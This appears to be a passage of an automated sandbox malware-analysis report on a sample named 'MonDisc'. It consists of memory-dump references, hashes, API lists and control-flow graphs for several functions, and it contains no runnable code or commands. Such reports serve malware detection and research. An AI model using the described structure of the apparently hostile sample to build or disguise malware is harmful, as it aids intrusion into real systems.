                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Popup$Window$Message$ActiveCurrentDesktopExtraIconicInfoLastLengthProcessTextTimeZoomed
                              • String ID:
                              • API String ID: 1249249616-0
                              • Opcode ID: 649e96a3040e716dd2e475f25863d26953d14027e2addb84bc51d75de1cabe73
                              • Instruction ID: 7bef7cea88e5bd89c8e1d25cfa540e282b1e8d2b0ae9156683c7e7ba320bd845
                              • Opcode Fuzzy Hash: 649e96a3040e716dd2e475f25863d26953d14027e2addb84bc51d75de1cabe73
                              • Instruction Fuzzy Hash: 59625EA3E289034AFF446F34AC662B969D57F263B4FA4473AD419D22D7EF2CB1458103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F834D Relevance: 51.8, APIs: 34, Instructions: 836windowtimeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: PopupWindow$Message$ActiveCurrentDesktopExtraIconicInfoLastLengthProcessTextTimeZoomed
                              • String ID:
                              • API String ID: 4133814404-0
                              • Opcode ID: 7675edd059d30eba094bff5d3b99d3534c4a9bcfa657b59bcbe04e52a15992e7
                              • Instruction ID: 8b68264210559b207cab4b9bb32b1c7e8740c8e11b58d146dd131adef6c26471
                              • Opcode Fuzzy Hash: 7675edd059d30eba094bff5d3b99d3534c4a9bcfa657b59bcbe04e52a15992e7
                              • Instruction Fuzzy Hash: D2625DA7E289034AFF446F34AC662B969D47F263B4FA4473AD419D22D7EF2CB1458103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F81BD Relevance: 48.6, APIs: 32, Instructions: 585COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 19466474feee5869fef1398aee390ee7b46f57e004e48e6c13e1203a141ea1ad
                              • Instruction ID: c3dd9cdd65f58efd872d6328274130541b24cd4587b1b7cca7c9878c0e166398
                              • Opcode Fuzzy Hash: 19466474feee5869fef1398aee390ee7b46f57e004e48e6c13e1203a141ea1ad
                              • Instruction Fuzzy Hash: 17325292D1CA178EFF516B309C262B926957F273B0FA48636D84DD7297EF2CB0858113
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F63BA Relevance: 36.3, APIs: 24, Instructions: 291timeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6382 7ff62c8f63ba-7ff62c8f63ca GetDesktopWindow 6383 7ff62c8f63cc-7ff62c8f63e0 call 7ff62c984484 6382->6383 6386 7ff62c8f63e2-7ff62c8f63e8 6383->6386 6387 7ff62c8f63eb-7ff62c8f63ee 6383->6387 6386->6387 6388 7ff62c8f63f5-7ff62c8f6406 call 7ff62c984484 6387->6388 6389 7ff62c8f63f0-7ff62c8f63f3 6387->6389 6392 7ff62c8f6411-7ff62c8f647c GetDoubleClickTime 6388->6392 6393 7ff62c8f6408-7ff62c8f640e 6388->6393 6389->6383 6389->6388 6397 7ff62c8f647e-7ff62c8f6493 GetSystemDefaultLangID 6392->6397 6393->6392 6397->6397 6398 7ff62c8f6495-7ff62c8f64bb call 7ff62c984af0 GetDoubleClickTime call 7ff62c984484 6397->6398 6403 7ff62c8f64bd-7ff62c8f64c3 6398->6403 6404 7ff62c8f64c6-7ff62c8f64d3 call 7ff62c984484 6398->6404 6403->6404 6408 7ff62c8f64d5-7ff62c8f64db 6404->6408 6409 7ff62c8f64de-7ff62c8f6517 GetDoubleClickTime call 7ff62c984484 6404->6409 6408->6409 6413 7ff62c8f6522-7ff62c8f6525 6409->6413 6414 7ff62c8f6519-7ff62c8f651f 6409->6414 6415 7ff62c8f6594-7ff62c8f65c4 call 7ff62c984484 6413->6415 6416 7ff62c8f6527-7ff62c8f652f call 7ff62c984484 6413->6416 6414->6413 6424 7ff62c8f65cf-7ff62c8f65ef GetDoubleClickTime GetDesktopWindow GetWindowTextLengthW 6415->6424 6425 7ff62c8f65c6-7ff62c8f65cc 6415->6425 6422 7ff62c8f6531-7ff62c8f6537 6416->6422 6423 7ff62c8f653a-7ff62c8f653d 6416->6423 6422->6423 6426 7ff62c8f6552-7ff62c8f655a call 7ff62c984484 6423->6426 6427 7ff62c8f653f 6423->6427 6431 7ff62c8f65f1-7ff62c8f6600 6424->6431 6425->6424 6434 7ff62c8f6565-7ff62c8f657b call 7ff62c984484 6426->6434 6435 7ff62c8f655c-7ff62c8f6562 6426->6435 6429 7ff62c8f6541-7ff62c8f6550 6427->6429 6429->6426 6429->6429 6431->6431 6433 7ff62c8f6602-7ff62c8f6608 GetDoubleClickTime 6431->6433 6436 7ff62c8f660a-7ff62c8f6627 6433->6436 6441 7ff62c8f657d-7ff62c8f6583 6434->6441 6442 7ff62c8f6586-7ff62c8f658e 6434->6442 6435->6434 6436->6436 6438 7ff62c8f6629-7ff62c8f6639 GetWindowTextLengthW call 7ff62c984484 6436->6438 6444 7ff62c8f6644-7ff62c8f6658 call 7ff62c984484 6438->6444 6445 7ff62c8f663b-7ff62c8f6641 6438->6445 6441->6442 6442->6415 6449 7ff62c8f6663-7ff62c8f66f4 GetCommandLineW GetForegroundWindow GetTopWindow call 7ff62c8fd980 call 7ff62c984af0 call 7ff62c8fe0a0 GetLargePageMinimum GetForegroundWindow call 7ff62c984484 6444->6449 6450 7ff62c8f665a-7ff62c8f6660 6444->6450 6445->6444 6459 7ff62c8f66f9-7ff62c8f66fc 6449->6459 6450->6449 6460 7ff62c8f66fe-7ff62c8f6704 6459->6460 6461 7ff62c8f6707-7ff62c8f670d 6459->6461 6460->6461 6462 7ff62c8f6713 6461->6462 6463 7ff62c8f67f0-7ff62c8f688c GetTickCount call 7ff62c984484 6461->6463 6464 7ff62c8f671b-7ff62c8f671e 6462->6464 6471 7ff62c8f688e-7ff62c8f6894 6463->6471 6472 7ff62c8f6897-7ff62c8f68e9 GetWindowTextLengthW IsIconic GetCommandLineW GetDoubleClickTime GetUserDefaultLangID GetDesktopWindow GetParent call 7ff62c984484 6463->6472 6464->6463 6466 7ff62c8f6724-7ff62c8f672c call 7ff62c984484 6464->6466 6473 7ff62c8f672e-7ff62c8f6734 6466->6473 6474 7ff62c8f6737-7ff62c8f6757 GetForegroundWindow call 7ff62c984484 6466->6474 6471->6472 6481 7ff62c8f68f4-7ff62c8f6912 call 7ff62c984484 6472->6481 6482 7ff62c8f68eb-7ff62c8f68f1 6472->6482 6473->6474 6483 7ff62c8f6762-7ff62c8f67dc call 7ff62c984484 6474->6483 6484 7ff62c8f6759-7ff62c8f675f 6474->6484 6491 7ff62c8f6914-7ff62c8f691a 6481->6491 6492 7ff62c8f691d-7ff62c8f6989 6481->6492 6482->6481 6494 7ff62c8f67de-7ff62c8f67e4 6483->6494 6495 7ff62c8f67e7-7ff62c8f67ea 6483->6495 6484->6483 6491->6492 6496 7ff62c8f6990-7ff62c8f69b2 6492->6496 6494->6495 6495->6463 6495->6464 6496->6496 6497 7ff62c8f69b4-7ff62c8f69d7 6496->6497
                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ClickDoubleTime$DefaultDesktopLangSystemWindow
                              • String ID:
                              • API String ID: 146177575-0
                              • Opcode ID: 1ab11c2d80e92e67c8a4e12a9d8885586669eec9125ded3814e100798d82fbde
                              • Instruction ID: a29f918c35169a58e0984b62eca24ba4dc25f963b370f662b738bcafeeb3db39
                              • Opcode Fuzzy Hash: 1ab11c2d80e92e67c8a4e12a9d8885586669eec9125ded3814e100798d82fbde
                              • Instruction Fuzzy Hash: 2EC162A2D2C9438AFF006B34AD1A2B926E47F257B4F544B39D40AD26A7DF3CF1458613
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF605B873EA Relevance: 11.9, Strings: 7, Instructions: 3134COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000003.488748301.00007FF605B86000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF605B86000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_3_7ff605b86000_MonDisc.jbxd
                              Similarity
                              • API ID:
                              • String ID: $!$3$?$@'z$h^z$h^z
                              • API String ID: 0-1850887679
                              • Opcode ID: 22cd7ff66e859ccd906eead52ddb1aa94e97611fde4b83fe9c1f16c1b88ab1d2
                              • Instruction ID: e5d911f852e89b706b4a640965de96ff72ceca900b61781091f2c27233062af7
                              • Opcode Fuzzy Hash: 22cd7ff66e859ccd906eead52ddb1aa94e97611fde4b83fe9c1f16c1b88ab1d2
                              • Instruction Fuzzy Hash: 8643F931C14B0F8AD7569F288448670B3A0FF1A710F699774C89EAA4C5EF7479DAC782
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF605B8BCAA Relevance: 1.2, Instructions: 1209COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000016.00000003.488748301.00007FF605B86000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF605B86000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_3_7ff605b86000_MonDisc.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 728f8aefec96af9c86c341f1da52758fc970afc4113fa47fc3de2dba9be93183
                              • Instruction ID: 80a08a29867e407f8bdc39266dc65155de18171b55bfb885f8d1dcb65acdeea2
                              • Opcode Fuzzy Hash: 728f8aefec96af9c86c341f1da52758fc970afc4113fa47fc3de2dba9be93183
                              • Instruction Fuzzy Hash: 35921B31C18A1F4ADB56AA288888675B390FF19700F6557B5DC8EEB086DF747C86C6C2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8FA34C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 196windowCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6498 7ff62c8fa34c-7ff62c8fa36b call 7ff62c984484 6501 7ff62c8fa374-7ff62c8fa38b 6498->6501 6502 7ff62c8fa36d-7ff62c8fa372 6498->6502 6503 7ff62c8fa391-7ff62c8fa399 call 7ff62c984484 6501->6503 6502->6501 6506 7ff62c8fa3a2-7ff62c8fa3a7 6503->6506 6507 7ff62c8fa39b-7ff62c8fa3a0 6503->6507 6509 7ff62c8fa3aa 6506->6509 6507->6506 6510 7ff62c8fa3ad-7ff62c8fa3ca GetUserDefaultLangID 6509->6510 6510->6510 6511 7ff62c8fa3cc-7ff62c8fa3dd 6510->6511 6511->6509 6512 7ff62c8fa3df-7ff62c8fa415 call 7ff62c984484 6511->6512 6516 7ff62c8fa41e-7ff62c8fa451 call 7ff62c984484 6512->6516 6517 7ff62c8fa417-7ff62c8fa41c 6512->6517 6520 7ff62c8fa453-7ff62c8fa458 6516->6520 6521 7ff62c8fa45a-7ff62c8fa45d 6516->6521 6517->6516 6520->6521 6522 7ff62c8fa45f-7ff62c8fa463 6521->6522 6523 7ff62c8fa469-7ff62c8fa477 GetMessageExtraInfo call 7ff62c984484 6521->6523 6522->6503 6522->6523 6526 7ff62c8fa480-7ff62c8fa483 6523->6526 6527 7ff62c8fa479-7ff62c8fa47e 6523->6527 6528 7ff62c8fa549-7ff62c8fa557 AnyPopup call 7ff62c984484 6526->6528 6529 7ff62c8fa489-7ff62c8fa491 call 7ff62c984484 6526->6529 6527->6526 6534 7ff62c8fa560-7ff62c8fa56d call 7ff62c984484 6528->6534 6535 7ff62c8fa559-7ff62c8fa55e 6528->6535 6536 7ff62c8fa493-7ff62c8fa498 6529->6536 6537 7ff62c8fa49a-7ff62c8fa49d 6529->6537 6547 7ff62c8fa56f-7ff62c8fa574 6534->6547 6548 7ff62c8fa576-7ff62c8fa584 6534->6548 6535->6534 6536->6537 6539 7ff62c8fa4a3-7ff62c8fa4ab call 7ff62c984484 6537->6539 6540 7ff62c8fa59d-7ff62c8fa5a5 call 7ff62c984484 6537->6540 6549 7ff62c8fa4b4-7ff62c8fa4c8 6539->6549 6550 7ff62c8fa4ad-7ff62c8fa4b2 6539->6550 6551 7ff62c8fa5ae-7ff62c8fa5b1 6540->6551 6552 7ff62c8fa5a7-7ff62c8fa5ac 6540->6552 6547->6548 6555 7ff62c8fa5c2-7ff62c8fa615 GetLargePageMinimum GetModuleHandleW call 7ff62c8f5f48 call 7ff62c8fe7c0 call 7ff62c8fb610 6548->6555 6556 7ff62c8fa4cc 6549->6556 6557 7ff62c8fa4ca 6549->6557 6550->6549 6553 7ff62c8fa5b3 6551->6553 6554 7ff62c8fa586-7ff62c8fa58a 6551->6554 6552->6551 6553->6555 6558 7ff62c8fa50b-7ff62c8fa513 call 7ff62c984484 6553->6558 6554->6558 6559 7ff62c8fa590-7ff62c8fa597 6554->6559 6561 7ff62c8fa4cf-7ff62c8fa4d3 6556->6561 6557->6556 6557->6558 6570 7ff62c8fa515-7ff62c8fa51a 6558->6570 6571 7ff62c8fa51c-7ff62c8fa532 call 7ff62c984484 6558->6571 6559->6540 6564 7ff62c8fa4d5-7ff62c8fa4ea call 7ff62c984484 6561->6564 6565 7ff62c8fa503 6561->6565 6573 7ff62c8fa4f3-7ff62c8fa4ff 6564->6573 6574 7ff62c8fa4ec-7ff62c8fa4f1 6564->6574 6565->6558 6570->6571 6581 7ff62c8fa534-7ff62c8fa539 6571->6581 6582 7ff62c8fa53b-7ff62c8fa543 6571->6582 6573->6561 6577 7ff62c8fa501 6573->6577 6574->6573 6577->6561 6577->6565 6581->6582 6582->6528
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: DefaultExtraInfoLangMessageUser
                              • String ID: <
                              • API String ID: 3021954254-4251816714
                              • Opcode ID: 402f9aef2e047f993df22b8c630db0140b6e5c85603be60a7ccbcf4cca1a9ae4
                              • Instruction ID: 087b3a54ed1d34837da6572d19a92faa152105025a53e25295fae01fa3735caf
                              • Opcode Fuzzy Hash: 402f9aef2e047f993df22b8c630db0140b6e5c85603be60a7ccbcf4cca1a9ae4
                              • Instruction Fuzzy Hash: 7461AF57D685038AEF515F389C9A2FA59D43F293B4F948639D849C21A7EE3CF1898103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C900C60 Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ContextEntryFunctionLookup$CaptureExceptionRaiseRestoreUnwindVirtual
                              • String ID:
                              • API String ID: 2358177407-0
                              • Opcode ID: 4c4c5958612997501fae227bd0c84ea8e1ad64d21959aac5b581581413320623
                              • Instruction ID: 02850991cc3d5dc36d953c0e9c5773ddb23191c0d570766eab3e868c25b50f8c
                              • Opcode Fuzzy Hash: 4c4c5958612997501fae227bd0c84ea8e1ad64d21959aac5b581581413320623
                              • Instruction Fuzzy Hash: 83314932A08B8182EF608F15F8443EAB361FB88790F485436DA8D43669EF3DE549CB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8FA3FB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 153windowCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6601 7ff62c8fa3fb-7ff62c8fa400 6602 7ff62c8fa402-7ff62c8fa405 6601->6602 6603 7ff62c8fa40d-7ff62c8fa415 call 7ff62c984484 6602->6603 6604 7ff62c8fa407-7ff62c8fa40b 6602->6604 6609 7ff62c8fa41e-7ff62c8fa451 call 7ff62c984484 6603->6609 6610 7ff62c8fa417-7ff62c8fa41c 6603->6610 6604->6603 6605 7ff62c8fa3e4-7ff62c8fa3f9 call 7ff62c984484 6604->6605 6605->6601 6605->6602 6614 7ff62c8fa453-7ff62c8fa458 6609->6614 6615 7ff62c8fa45a-7ff62c8fa45d 6609->6615 6610->6609 6614->6615 6616 7ff62c8fa45f-7ff62c8fa463 6615->6616 6617 7ff62c8fa469-7ff62c8fa477 GetMessageExtraInfo call 7ff62c984484 6615->6617 6616->6617 6618 7ff62c8fa391-7ff62c8fa399 call 7ff62c984484 6616->6618 6622 7ff62c8fa480-7ff62c8fa483 6617->6622 6623 7ff62c8fa479-7ff62c8fa47e 6617->6623 6627 7ff62c8fa3a2-7ff62c8fa3a7 6618->6627 6628 7ff62c8fa39b-7ff62c8fa3a0 6618->6628 6625 7ff62c8fa549-7ff62c8fa557 AnyPopup call 7ff62c984484 6622->6625 6626 7ff62c8fa489-7ff62c8fa491 call 7ff62c984484 6622->6626 6623->6622 6635 7ff62c8fa560-7ff62c8fa56d call 7ff62c984484 6625->6635 6636 7ff62c8fa559-7ff62c8fa55e 6625->6636 6637 7ff62c8fa493-7ff62c8fa498 6626->6637 6638 7ff62c8fa49a-7ff62c8fa49d 6626->6638 6634 7ff62c8fa3aa 6627->6634 6628->6627 6639 7ff62c8fa3ad-7ff62c8fa3ca GetUserDefaultLangID 6634->6639 6651 7ff62c8fa56f-7ff62c8fa574 6635->6651 6652 7ff62c8fa576-7ff62c8fa584 6635->6652 6636->6635 6637->6638 6641 7ff62c8fa4a3-7ff62c8fa4ab call 7ff62c984484 6638->6641 6642 7ff62c8fa59d-7ff62c8fa5a5 call 7ff62c984484 6638->6642 6639->6639 6643 7ff62c8fa3cc-7ff62c8fa3dd 6639->6643 6653 7ff62c8fa4b4-7ff62c8fa4c8 6641->6653 6654 7ff62c8fa4ad-7ff62c8fa4b2 6641->6654 6655 7ff62c8fa5ae-7ff62c8fa5b1 6642->6655 6656 7ff62c8fa5a7-7ff62c8fa5ac 6642->6656 6643->6634 6644 7ff62c8fa3df 6643->6644 6644->6603 6651->6652 6659 7ff62c8fa5c2-7ff62c8fa5d9 GetLargePageMinimum GetModuleHandleW call 7ff62c8f5f48 6652->6659 6660 7ff62c8fa4cc 6653->6660 6661 7ff62c8fa4ca 6653->6661 6654->6653 6657 7ff62c8fa5b3 6655->6657 6658 7ff62c8fa586-7ff62c8fa58a 6655->6658 6656->6655 6657->6659 6662 7ff62c8fa50b-7ff62c8fa513 call 7ff62c984484 6657->6662 6658->6662 6663 7ff62c8fa590-7ff62c8fa597 6658->6663 6667 7ff62c8fa5de-7ff62c8fa5ef call 7ff62c8fe7c0 6659->6667 6665 7ff62c8fa4cf-7ff62c8fa4d3 6660->6665 6661->6660 6661->6662 6674 7ff62c8fa515-7ff62c8fa51a 6662->6674 6675 7ff62c8fa51c-7ff62c8fa532 call 7ff62c984484 6662->6675 6663->6642 6668 7ff62c8fa4d5-7ff62c8fa4ea call 7ff62c984484 6665->6668 6669 7ff62c8fa503 6665->6669 6683 7ff62c8fa5f3-7ff62c8fa5f6 call 7ff62c8fb610 6667->6683 6677 7ff62c8fa4f3-7ff62c8fa4ff 6668->6677 6678 7ff62c8fa4ec-7ff62c8fa4f1 6668->6678 6669->6662 6674->6675 6685 7ff62c8fa534-7ff62c8fa539 6675->6685 6686 7ff62c8fa53b-7ff62c8fa543 6675->6686 6677->6665 6681 7ff62c8fa501 6677->6681 6678->6677 6681->6665 6681->6669 6688 7ff62c8fa5fb-7ff62c8fa615 6683->6688 6685->6686 6686->6625
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ExtraHandleInfoLargeMessageMinimumModulePagePopup
                              • String ID: <
                              • API String ID: 2008092851-4251816714
                              • Opcode ID: 5b82afd13b6bb972a03a49472783478f1010767152c41c8eb140941de95efdb6
                              • Instruction ID: 8d23a95a2b9b932e6a4cc62c2c0218142066baec86900b377243b1e269e8e6cf
                              • Opcode Fuzzy Hash: 5b82afd13b6bb972a03a49472783478f1010767152c41c8eb140941de95efdb6
                              • Instruction Fuzzy Hash: C251BF57D689034AFF555B349CAA2FA59C43F293B4F948A39D949C22A3DE3CF1894103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C914230 Relevance: 7.7, APIs: 6, Instructions: 155memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6689 7ff62c914230-7ff62c914265 6690 7ff62c91426b-7ff62c91427c 6689->6690 6691 7ff62c9142fd-7ff62c91430e 6689->6691 6690->6691 6694 7ff62c91427e-7ff62c9142b4 GetLastError VirtualAlloc SetLastError 6690->6694 6692 7ff62c91445b 6691->6692 6693 7ff62c914314-7ff62c914349 GetLastError VirtualAlloc SetLastError 6691->6693 6696 7ff62c91445d-7ff62c91447b 6692->6696 6693->6692 6695 7ff62c91434f-7ff62c91435c 6693->6695 6694->6691 6697 7ff62c9142b6-7ff62c9142bc 6694->6697 6700 7ff62c914362-7ff62c914366 6695->6700 6701 7ff62c914404-7ff62c91440d call 7ff62c913f80 6695->6701 6698 7ff62c9142be-7ff62c9142c1 6697->6698 6699 7ff62c9142c3-7ff62c9142c6 6697->6699 6702 7ff62c9142c9-7ff62c9142f7 6698->6702 6699->6702 6704 7ff62c914370-7ff62c91437e 6700->6704 6705 7ff62c914412-7ff62c914419 6701->6705 6702->6691 6702->6696 6706 7ff62c91438b-7ff62c914392 6704->6706 6707 7ff62c914380-7ff62c914387 6704->6707 6705->6692 6708 7ff62c91441b-7ff62c914442 6705->6708 6710 7ff62c9143ea-7ff62c9143ed 6706->6710 6711 7ff62c914394-7ff62c914397 6706->6711 6707->6704 6709 7ff62c914389 6707->6709 6708->6696 6712 7ff62c9143ef 6709->6712 6710->6701 6710->6712 6711->6710 6713 7ff62c914399-7ff62c9143b2 6711->6713 6714 7ff62c9143f3-7ff62c9143f9 6712->6714 6715 7ff62c9143be-7ff62c9143e8 6713->6715 6716 7ff62c9143b4-7ff62c9143ba 6713->6716 6717 7ff62c9143fb-7ff62c914402 6714->6717 6718 7ff62c914444-7ff62c914459 call 7ff62c915690 6714->6718 